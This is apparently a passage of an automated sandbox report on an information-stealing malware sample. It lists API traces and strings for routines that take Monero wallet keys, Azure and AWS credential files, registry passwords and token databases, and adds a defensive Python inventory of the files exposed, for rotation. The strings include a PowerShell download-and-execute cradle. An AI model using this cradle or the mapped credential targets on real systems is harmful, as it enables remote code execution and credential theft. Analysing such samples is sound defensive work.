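Read back, the sequence is a direct (no proxy) HTTP connection, a keep-alive GET with `Pragma: no-cache` (0x00400000 | 0x00000100), a security-flags option set before sending, and a reply that is accepted unless it is the literal string `ERROR`. The extra trailing arguments the plugin prints for SHGetFolderPathA are stack residue, which is why the decoder only indexes the parameters the real prototypes define.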
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true (associated dumps identical to those listed for the first function in this section)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: b524084387941071e12e0c4bd41a86311a532b1dfd9c82142de3eb6b2ab7c76b
                      • Instruction ID: 296a714bd5dc43c63fdc2f07ef4c96f64ced8270be43bc3d61198f381f9cc2ca
                      • Opcode Fuzzy Hash: b524084387941071e12e0c4bd41a86311a532b1dfd9c82142de3eb6b2ab7c76b
                      • Instruction Fuzzy Hash: 66C1D8B590010DABCB14EF60DC9DFEA7B78BF94301F10459AF90A67141EB74AA89CF91
                      APIs
                        • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 005542EC
                      • lstrcat.KERNEL32(?,0102F398), ref: 0055430B
                      • lstrcat.KERNEL32(?,?), ref: 0055431F
                      • lstrcat.KERNEL32(?,0102DBC8), ref: 00554333
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 00558D90: GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F
                        • Part of subcall function 00549CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00549D39
                        • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                        • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                        • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                        • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                        • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                        • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                        • Part of subcall function 005593C0: GlobalAlloc.KERNEL32(00000000,005543DD,005543DD), ref: 005593D3
                      • StrStrA.SHLWAPI(?,0102F530), ref: 005543F3
                      • GlobalFree.KERNEL32(?), ref: 00554512
                        • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                        • Part of subcall function 00549AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                        • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                        • Part of subcall function 00549AC0: LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 005544A3
                      • StrCmpCA.SHLWAPI(?,005608D1), ref: 005544C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 005544D2
                      • lstrcat.KERNEL32(00000000,?), ref: 005544E5
                      • lstrcat.KERNEL32(00000000,00560FB8), ref: 005544F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true (associated dumps identical to those listed for the first function in this section)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: c32f42d92bf93a4df80de71d32298b7c6946e6d0d550a32ea85576b8222caedf
                      • Instruction ID: 4aee48c8a7bc8eb321a112bb6ac56b08b5e9b097b10628c042f54950b7b1ada8
                      • Opcode Fuzzy Hash: c32f42d92bf93a4df80de71d32298b7c6946e6d0d550a32ea85576b8222caedf
                      • Instruction Fuzzy Hash: 3D717A76900209B7DB14EBB0DC5AFEE7778BB88305F008599F60597181EA34DB49CFA1
                      APIs
                        • Part of subcall function 005412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
                        • Part of subcall function 005412A0: RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
                        • Part of subcall function 005412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005412D7
                        • Part of subcall function 005412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
                        • Part of subcall function 005412A0: RegCloseKey.ADVAPI32(?), ref: 005412FF
                      • lstrcat.KERNEL32(?,00000000), ref: 0054134F
                      • lstrlen.KERNEL32(?), ref: 0054135C
                      • lstrcat.KERNEL32(?,.keys), ref: 00541377
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0102EBC0,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00541465
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                        • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                        • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                        • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                        • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                        • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 005414EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true (associated dumps identical to those listed for the first function in this section)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: 3513eab9574f870ac3008d1e90211fe956cbb6912b7b78d6692f58a620c644ec
                      • Instruction ID: 8bd5bca6df3892e5a226774a2ee33e6d60d2f5b283a2db29aa0b74d1655ca757
                      • Opcode Fuzzy Hash: 3513eab9574f870ac3008d1e90211fe956cbb6912b7b78d6692f58a620c644ec
                      • Instruction Fuzzy Hash: 595145B1D5011A57CB15FB60DDA6FED773CBF94301F404299B60A62081EE346B89CFA6
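Two functions in this section collect credential files rather than browser data: the walker near the start of the section (SHGetFolderPathA, then lstrcat of `\.azure\`, `\.aws\` and `\.IdentityService\`, FindFirstFileA/FindNextFileA over `*.*`, PathMatchSpecA, CopyFileA, DeleteFileA, with `msal.cache` among its string IDs) and the Monero routine above (RegQueryValueExA of `wallet_path` under `SOFTWARE\monero-project\monero-core`, `.keys` appended, fallback `\Monero\wallet.keys`, then CopyFileA, read, DeleteFileA). Added example serving both passages, not part of the report: a Python inventory that lists, for a given profile directory, the files those two routines would have taken, which is the rotation list after this sample has run. Assumptions: the base folder for the cloud directories and for the Monero fallback is the profile root passed in (the trace does not resolve it, and the registry hive for the Monero key is not shown either); the fixture profile is constructed.

```python
import tempfile
from dataclasses import dataclass
from datetime import datetime, timezone
from pathlib import Path
from typing import List, Optional

# Directories the walker appends to the folder path: \.azure\, \.aws\, \.IdentityService\
CLOUD_DIRS = ('.azure', '.aws', '.IdentityService')


@dataclass
class Artifact:
    category: str
    path: str
    size: int
    modified_utc: str


def _artifact(category: str, p: Path) -> Artifact:
    st = p.stat()
    return Artifact(category, str(p), st.st_size,
                    datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(timespec='seconds'))


def cloud_cli_artifacts(profile_root: Path) -> List[Artifact]:
    """Everything the FindFirstFileA/FindNextFileA('*.*') loop would copy out of the three CLI folders."""
    found = []
    for name in CLOUD_DIRS:
        base = profile_root / name
        if not base.is_dir():
            continue
        for p in sorted(base.rglob('*')):
            if p.is_file():
                # msal.cache is the MSAL token cache: its loss is a live session, not just a config file
                found.append(_artifact('msal-token-cache' if p.name == 'msal.cache' else name, p))
    return found


def monero_wallet_artifacts(profile_root: Path, wallet_path_value: Optional[str]) -> List[Artifact]:
    """wallet_path (SOFTWARE\\monero-project\\monero-core) names the wallet without extension and the
    trace appends '.keys'; with no value it falls back to \\Monero\\wallet.keys.
    Assumption: the fallback is resolved relative to profile_root."""
    candidate = Path(wallet_path_value + '.keys') if wallet_path_value else profile_root / 'Monero' / 'wallet.keys'
    return [_artifact('monero-wallet-keys', candidate)] if candidate.is_file() else []


def inventory(profile_root: Path, wallet_path_value: Optional[str] = None) -> List[Artifact]:
    return cloud_cli_artifacts(profile_root) + monero_wallet_artifacts(profile_root, wallet_path_value)


def build_demo_profile(root: Path) -> None:
    """Constructed fixture: a fake profile with the file names the real tools leave behind (contents are filler)."""
    (root / '.azure').mkdir()
    (root / '.azure' / 'azureProfile.json').write_text('{"subscriptions":[]}')
    (root / '.azure' / 'msal_token_cache.bin').write_bytes(b'\x00' * 16)
    (root / '.aws').mkdir()
    (root / '.aws' / 'credentials').write_text('[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n')
    (root / '.IdentityService').mkdir()
    (root / '.IdentityService' / 'msal.cache').write_bytes(b'\x00' * 16)
    (root / 'Monero').mkdir()
    (root / 'Monero' / 'wallet.keys').write_bytes(b'\x00' * 16)


def demo(wallet_path_value: Optional[str] = None) -> List[Artifact]:
    """Run the inventory against the constructed profile in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_demo_profile(root)
        return inventory(root, wallet_path_value)


if __name__ == '__main__':
    for a in demo():
        print(f'{a.category:<18} {a.size:>6}  {a.modified_utc}  {a.path}')
```

On a real host, pass the user's profile directory and the registry value read from the Monero key; every returned path is a credential or token that should be treated as exposed, and the modification times bound how old the stolen material is.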
                      APIs
                        • Part of subcall function 005472D0: memset.MSVCRT ref: 00547314
                        • Part of subcall function 005472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0054733A
                        • Part of subcall function 005472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
                        • Part of subcall function 005472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
                        • Part of subcall function 005472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
                        • Part of subcall function 005472D0: HeapFree.KERNEL32(00000000), ref: 00547459
                      • lstrcat.KERNEL32(00000000,005617FC), ref: 00547606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00547648
                      • lstrcat.KERNEL32(00000000, : ), ref: 0054765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 0054768F
                      • lstrcat.KERNEL32(00000000,00561804), ref: 005476A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 005476D3
                      • lstrcat.KERNEL32(00000000,00561808), ref: 005476ED
                      • task.LIBCPMTD ref: 005476FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true (associated dumps identical to those listed for the first function in this section)
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: :
                      • API String ID: 3191641157-3653984579
                      • Opcode ID: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
                      • Instruction ID: 044deabaefb69752478f4a9cd8b8b0ef747b106a024b79909f6d9db1906845c1
                      • Opcode Fuzzy Hash: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
                      • Instruction Fuzzy Hash: 12318371A4010AEFDB04EBB4DC59DFF7B75FB88305B24810AF102A7251EB38A946CB65
                      APIs
                      • memset.MSVCRT ref: 00547314
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0054733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
                      • HeapFree.KERNEL32(00000000), ref: 00547459
                      • task.LIBCPMTD ref: 00547555
                      Strings
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: Password
                      • API String ID: 2808661185-3434357891
                      • Opcode ID: 24ba2bea9ba16a8ee07ac987d098acf05121936016b5e0a8fa29ae64a50be244
                      • Instruction ID: dfd562b83884cecb16fbd4e1631704645cd817438414521d642774f6791628f7
                      • Opcode Fuzzy Hash: 24ba2bea9ba16a8ee07ac987d098acf05121936016b5e0a8fa29ae64a50be244
                      • Instruction Fuzzy Hash: 9E613CB590426D9BDB24DB50CC45FEABBB8BF48304F0085E9E649A6141DBB05FC9CFA1
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                        • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                      • InternetOpenA.WININET(00560DF7,00000001,00000000,00000000,00000000), ref: 0054610F
                      • StrCmpCA.SHLWAPI(?,0102FC80), ref: 00546147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0054618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005461B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 005461DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0054620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00546249
                      • InternetCloseHandle.WININET(?), ref: 00546253
                      • InternetCloseHandle.WININET(00000000), ref: 00546260
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID:
                      • API String ID: 2507841554-0
                      • Opcode ID: 59507e7f1c8fac8384882174f9546b8e9fb74a86fdcf1cc9a9fdece59affcd34
                      • Instruction ID: af584ca26c0e9cd2120ff875c94e8d6bb48393cec1f3a023caf0e4bef631a4e1
                      • Opcode Fuzzy Hash: 59507e7f1c8fac8384882174f9546b8e9fb74a86fdcf1cc9a9fdece59affcd34
                      • Instruction Fuzzy Hash: 035194B1940208BBEF20DF60DC49BEE7B78FB44705F108599B605A71C1DBB46A89CF96
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                      • lstrlen.KERNEL32(00000000), ref: 0054BC9F
                        • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0054BCCD
                      • lstrlen.KERNEL32(00000000), ref: 0054BDA5
                      • lstrlen.KERNEL32(00000000), ref: 0054BDB9
                      Strings
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: df0d901d2b0f563244a4750cab4bff0610a1159770ab6b07634c4d911ee0aced
                      • Instruction ID: f3ebce9368cd3ddcef560f9fb02de06f0e249f32f023b29952cbf51ef4b0d7cd
                      • Opcode Fuzzy Hash: df0d901d2b0f563244a4750cab4bff0610a1159770ab6b07634c4d911ee0aced
                      • Instruction Fuzzy Hash: 9CB156719101099BDB04FBA0CC6ADEE7B38BF94301F50465AF907A7191EF346A4DCB66
                      APIs
                      Strings
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: 6af148906b4036e8cd00bb592a2c7fa66c4ca73109be37656a3724e3e8ccdfee
                      • Instruction ID: 1168a108d440578a3b88352e1a1992de71763d29cb89d12ad09c8206e86b6754
                      • Opcode Fuzzy Hash: 6af148906b4036e8cd00bb592a2c7fa66c4ca73109be37656a3724e3e8ccdfee
                      • Instruction Fuzzy Hash: 71F0893098424AFFE3449FE0E91972C7B70FB08703F24419AF60587290D67C4B41EB9A
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00544FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00544FD1
                      • InternetOpenA.WININET(00560DDF,00000000,00000000,00000000,00000000), ref: 00544FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00545011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00545041
                      • InternetCloseHandle.WININET(?), ref: 005450B9
                      • InternetCloseHandle.WININET(?), ref: 005450C6
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: a4f9a4164eda008e3c66823cec553df27d72fbb89fb14a765afa5fc77220a7fa
                      • Instruction ID: 982d4b4f9ccea9d7c363bfcab8c934c0b217a0aaa90232d2542d3496d4a9ef8e
                      • Opcode Fuzzy Hash: a4f9a4164eda008e3c66823cec553df27d72fbb89fb14a765afa5fc77220a7fa
                      • Instruction Fuzzy Hash: AC3107B4A40218ABDB20CF54DC89BDDBBB4FB48704F5081D9EA09A7281D7746E858F99
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0102F260,00000000,?,00560E2C,00000000,?,00000000), ref: 00558130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00558137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00558158
                      • wsprintfA.USER32 ref: 005581AC
                      Strings
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@
                      • API String ID: 2922868504-3474575989
                      • Opcode ID: 66776c86fd9d64b2b99acdc9d6571ba718b252245f3221c2208afdc0377d4914
                      • Instruction ID: 3baf981012064c3505892516461b4277773cbd6ad6e3eb0abb3d9f34f52027b9
                      • Opcode Fuzzy Hash: 66776c86fd9d64b2b99acdc9d6571ba718b252245f3221c2208afdc0377d4914
                      • Instruction Fuzzy Hash: DC214FB1E44209ABEB10DFD4CC49FAFBB78FB44711F20450AF605BB280D77869058BA5
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
                      • wsprintfA.USER32 ref: 00558459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0055847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0055848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00558499
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                      • RegQueryValueExA.ADVAPI32(00000000,0102F080,00000000,000F003F,?,00000400), ref: 005584EC
                      • lstrlen.KERNEL32(?), ref: 00558501
                      • RegQueryValueExA.ADVAPI32(00000000,0102F218,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00560B34), ref: 00558599
                      • RegCloseKey.ADVAPI32(00000000), ref: 00558608
                      • RegCloseKey.ADVAPI32(00000000), ref: 0055861A
                      Strings
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: 2060fb0a5a044d894fd238b020ce03e4264bd6bd7d1b79476edd78c3e5ab572c
                      • Instruction ID: 771b677b6ea2fe72d8ad1349b6ce3bf187fe8077ce4a3b2c10e13faffa7866a9
                      • Opcode Fuzzy Hash: 2060fb0a5a044d894fd238b020ce03e4264bd6bd7d1b79476edd78c3e5ab572c
                      • Instruction Fuzzy Hash: 14217C7194021CABEB24DB54CC84FE9B7B8FB48700F10C1D9E609A6140DF74AA85CFE4
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005576A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 005576AB
                      • RegOpenKeyExA.ADVAPI32(80000002,0101BD48,00000000,00020119,00000000), ref: 005576DD
                      • RegQueryValueExA.ADVAPI32(00000000,0102F230,00000000,00000000,?,000000FF), ref: 005576FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 00557708
                      Strings
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3225020163-2517555085
                      • Opcode ID: 2321066e657f836a8166b3c6ecaacf1eee969fd9f03b64cd9250d60dcc0a1f4a
                      • Instruction ID: 608aabfbea9ddaaab5bbc92660ad53ed3c26a568b9e027c14e1f19f51b2f1a3f
                      • Opcode Fuzzy Hash: 2321066e657f836a8166b3c6ecaacf1eee969fd9f03b64cd9250d60dcc0a1f4a
                      • Instruction Fuzzy Hash: 150144B5A44308BBEB00DBE4EC59F6D7BB8EB48701F208456FE05D7190D67899048B55
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0055773B
                      • RegOpenKeyExA.ADVAPI32(80000002,0101BD48,00000000,00020119,005576B9), ref: 0055775B
                      • RegQueryValueExA.ADVAPI32(005576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0055777A
                      • RegCloseKey.ADVAPI32(005576B9), ref: 00557784
                      Strings
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      APIs
                      • CreateFileA.KERNEL32(:U,80000000,00000003,00000000,00000003,00000080,00000000,?,00553AEE,?), ref: 005592FC
                      • GetFileSizeEx.KERNEL32(000000FF,:U), ref: 00559319
                      • CloseHandle.KERNEL32(000000FF), ref: 00559327
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID: :U$:U
                      • API String ID: 1378416451-4244293621
                      APIs
                      • memset.MSVCRT ref: 005540D5
                      • RegOpenKeyExA.ADVAPI32(80000001,0102E4A8,00000000,00020119,?), ref: 005540F4
                      • RegQueryValueExA.ADVAPI32(?,0102F590,00000000,00000000,00000000,000000FF), ref: 00554118
                      • RegCloseKey.ADVAPI32(?), ref: 00554122
                      • lstrcat.KERNEL32(?,00000000), ref: 00554147
                      • lstrcat.KERNEL32(?,0102F5C0), ref: 0055415B
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValuememset
                      • String ID:
                      • API String ID: 2623679115-0
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                      • LocalFree.KERNEL32(0054148F), ref: 00549A90
                      • CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      Similarity
                      • API ID: String___crt$Typememset
                      • String ID:
                      • API String ID: 3530896902-3916222277
                      APIs
                      • lstrcat.KERNEL32(?,0102F398), ref: 005547DB
                        • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00554801
                      • lstrcat.KERNEL32(?,?), ref: 00554820
                      • lstrcat.KERNEL32(?,?), ref: 00554834
                      • lstrcat.KERNEL32(?,0101A888), ref: 00554847
                      • lstrcat.KERNEL32(?,?), ref: 0055485B
                      • lstrcat.KERNEL32(?,0102E748), ref: 0055486F
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 00558D90: GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F
                        • Part of subcall function 00554570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
                        • Part of subcall function 00554570: RtlAllocateHeap.NTDLL(00000000), ref: 00554587
                        • Part of subcall function 00554570: wsprintfA.USER32 ref: 005545A6
                        • Part of subcall function 00554570: FindFirstFileA.KERNEL32(?,?), ref: 005545BD
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00552D85
                      Strings
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00552D04
                      • <, xrefs: 00552D39
                      • ')", xrefs: 00552CB3
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00552CC4
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00549F41
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • memset.MSVCRT ref: 0055716A
                      Strings
                      • sU, xrefs: 005572AE, 00557179, 0055717C
                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0055718C
                      • sU, xrefs: 00557111
                      Similarity
                      • API ID: lstrcpymemset
                      • String ID: sU$sU$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                      • API String ID: 4047604823-2944379081
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00557E3E
